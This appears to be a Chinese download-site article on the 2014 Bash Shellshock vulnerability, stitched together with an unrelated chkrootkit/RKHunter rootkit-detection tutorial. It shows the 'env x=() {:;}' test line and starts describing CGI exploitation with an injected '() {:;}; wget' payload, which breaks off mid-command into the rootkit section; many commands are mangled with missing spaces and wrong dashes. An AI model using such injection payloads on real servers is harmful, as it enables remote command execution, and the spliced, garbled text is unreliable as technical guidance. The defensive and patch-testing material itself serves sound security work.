bash漏洞修复后显示的内容，bash漏洞扫描

今天小编为大家分享Windows系统下载、Windows系统教程、windows相关应用程序的文章，希望能够帮助到大家！

从昨天开始，这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf，大家都在谈论，“互联网的心脏又出血了”，可是，亲，到底怎么对网站进行测试？下面这段脚本

$ env x=‘(){:;}; echo vulnerable' bash-c"echo this is a test"

它与“心脏出血”漏洞不同，“心脏出血”只能借助窃取用户电脑信息，而bash漏洞允许黑客远程控制电脑，拿到系统最高权限！其方法利用就更简单了——复制/粘贴一行命令代码即可！

BASH除了可以将shell变量导出为环境变量，还可以将shell函数导出为环境变量！当前版本的bash通过以函数名作为环境变量名，以“（）{”开头的字串作为环境变量的值来将函数定义导出为环境变量。

此次爆出的漏洞在于BASH处理这样的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令。

简单地说就是，Bash脚本在解析某些特殊字符串时出现逻辑错误导致可以执行后面的命令。

看到上面的解释，很多童鞋都理解成了本地的漏洞，然后很多人又觉得，本地有啥可以利用的，于是就忽略了这个神级漏洞的存在。我想说的是，这个漏洞，利用热度可以媲美当年的MS08-067，威力虽然弱了点，但远程控制电脑还是可以的。

首先解释一下cgi脚本。很多网站类似下面的链接：

GET help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1

后台不仅仅用python、Perl来解释执行并反馈给客户端Response，当然还可以换做bash脚本来解释执行提交上来的GET/POST请求。所以，理论上，你在HTTP请求中插入一个Bash命令，比如

(){:;}; wget mands[root@server~]# cp `which–skip-alias awk cut echo find egrep id head ls netstat ps strings sed uname`/usr/share/.commands[root@server~]#/usr/local/chkrootkit/chkrootkit-p/usr/share/.commands/[root@server share]# cd/usr/share/

  [root@server share]# tar zcvf commands.tar.gz.commands[root@server share]# rm-rf commands.tar.gz

上面这段操作是在/usr/share/下建立了一个.commands隐藏文件，然后将chkrootkit使用的系统命令进行备份到这个目录下。为了安全起见，可以将.commands目录压缩打包，然后下载到一个安全的地方进行备份，以后如果服务器遭受入侵，就可以将这个备份上传到服务器任意路径下，然后通过chkrootkit命令的“-p”参数指定这个路径进行检测即可。

三、rootkit后门检测工具RKHunter

RKHunter是一款专业的检测系统是否感染rootkit的工具，它通过执行一系列的脚本来确认服务器是否已经感染rootkit。在官方的资料中，RKHunter可以作的事情有：

MD5校验测试，检测文件是否有改动

检测rootkit使用的二进制和系统工具文件

检测常用程序的文件属性是否异常

下面详细讲述下RKHunter的安装与使用。

RKHunter的官方网页地址为：www.rootkit.nl/projects/rootkit_hunter.html，建议从这个网站下载RKHunter，这里下载的版本是rkhunter-1.4.0.tar.gz。RKHunter的安装非常简单，过程如下：

  rkhunter-1.4.0.tar.gz

  [root@server~]# pwd

  [root@server~]# tar-zxvf rkhunter-1.4.0.tar.gz[root@server~]# cd rkhunter-1.4.0

  [root@server rkhunter-1.4.0]#./installer.sh–layout default–install

这里采用RKHunter的默认安装方式，rkhunter命令被安装到了/usr/local/bin目录下。

rkhunter命令的参数较多，但是使用非常简单，直接运行rkhunter即可显示此命令的用法。下面简单介绍下rkhunter常用的几个参数选项。

[root@server~]#/usr/local/bin/rkhunter–helpRkhunter常用参数以及含义如下所示。

参数            含义

-c,–check必选参数，表示检测当前系统

–configfile file使用特定的配置文件

–sk,–skip-keypress自动完成所有检测，跳过键盘输入–summary显示检测结果的统计信息

下面是通过rkhunter对某个系统的检测示例：

[root@server rkhunter-1.4.0]#/usr/local/bin/rkhunter  -c[ Rootkit Hunter version 1.4.0 ]

#下面是第一部分，先进行系统命令的检查，主要是检测系统的二进制文件，因为这些文件最容易被rootkit攻击。显示OK字样表示正常，显示Warning表示有异常，需要引起注意，而显示“Not found”字样，一般无需理会

  Performing‘strings’ command checks

  Checking‘strings’ command [ OK ]

  Performing‘shared libraries’ checks

  Checking for preloading variables [ None found ]

  Checking for preloaded libraries [ None found ]

  Checking LD_LIBRARY_PATH variable [ Not found ]

  Performing file properties checks

  Checking for prerequisites [ Warning ]

  /usr/local/bin/rkhunter [ OK ]

  /sbin/chkconfig [ OK ]

  [Press ENTER to continue]

#下面是第二部分，主要检测常见的rootkit程序，显示“Not found”表示系统未感染此

rootkitChecking for rootkits…

  Performing check of known rootkit files and directories55808 Trojan– Variant A [ Not found ]

  ADM Worm [ Not found ]

  AjaKit Rootkit [ Not found ]

  Adore Rootkit [ Not found ]

  aPa Kit [ Not found ]

  Apache Worm [ Not found ]

  Ambient(ark) Rootkit [ Not found ]

  Balaur Rootkit [ Not found ]

  BeastKit Rootkit [ Not found ]

  beX2 Rootkit [ Not found ]

  BOBKit Rootkit [ Not found ]

  [Press ENTER to continue]

#下面是第三部分，主要是一些特殊或附加的检测，例如对rootkit文件或目录检测、对恶意软件检测以及对指定的内核模块检测

Performing additional rootkit checks

  Suckit Rookit additional checks [ OK ]

  Checking for possible rootkit files and directories [ None found ]

  Checking for possible rootkit strings [ None found ]

  Performing malware checks

  Checking running processes for suspicious files [ None found ]

  Checking for login backdoors [ None found ]

  Checking for suspicious directories [ None found ]

  Checking for sniffer log files [ None found ]

  Performing Linux specific checks

  Checking loaded kernel modules [ OK ]

  Checking kernel module names [ OK ]

  [Press ENTER to continue]

#下面是第四部分，主要对网络、系统端口、系统启动文件、系统用户和组配置、SSH配置、文件系统等进行检测

  Performing checks on the network ports

  Checking for backdoor ports [ None found ]

  Performing checks on the network interfacesChecking for promiscuous interfaces [ None found ]

  Checking the local host…

  Performing system boot checks

  Checking for local host name [ Found ]

  Checking for system startup files [ Found ]

  Checking system startup files for malware [ None found ]

  Performing group and account checks

  Checking for passwd file [ Found ]

  Checking for root equivalent(UID 0) accounts [ None found ]

  Checking for passwordless accounts [ None found ]

  [Press ENTER to continue]

#下面是第五部分，主要是对应用程序版本进行检测

Checking application versions…

  Checking version of GnuPG[ OK ]

  Checking version of OpenSSL [ Warning ]

  Checking version of OpenSSH [ OK ]

#下面是最后一部分，这个部分其实是上面输出的一个总结，通过这个总结，可以大概了解服务器目录的安全状态。

  =====================

  File properties checks…

  Required commands check failed

  Files checked: 137

  Rootkits checked: 311

  Possible rootkits: 0

  Applications checks…

  Applications checked: 3

  Suspect applications: 1

  The system checks took: 6 minutes and 41 seconds

在Linux终端使用rkhunter来检测，最大的好处在于每项的检测结果都有不同的颜色显示，如果是绿色的表示没有问题，如果是红色的，那就要引起关注了。另外，在上面执行检测的过程中，在每个部分检测完成后，需要以Enter键来继续。如果要让程序自动运行，可以执行如下命令：

[root@server~]#/usr/local/bin/rkhunter–check–skip-keypress同时，如果想让检测程序每天定时运行，那么可以在/etc/crontab中加入如下内容：

30 09*** root/usr/local/bin/rkhunter–check–cronjob这样，rkhunter检测程序就会在每天的9:30分运行一次。

今天刚刚爆出Bash安全漏洞，SSH bash紧急安全补丁！重要！

测试是否存在漏洞，执行以下命令：

$ env x=’(){:;}; echo vulnerable’ bash-c“echo this is a test”

如果显示如上，那么，很遗憾，必须立即打上安全补丁修复，临时解决办法为：

$ env x=’(){:;}; echo vulnerable’ bash-c“echo this is a test”

  bash: warning: x: ignoring function definition attemptbash: error importing function definition for `x’

如果显示如上，表示已经修补了漏洞。

wwW.Xtw.Com.cN系统网专业的PC、手机系统开发下载平台，HarmonyOS系统、安卓、OS、windows电脑重装系统在线下载安装,操作系统平台技术学习,攻略教程,技术交流。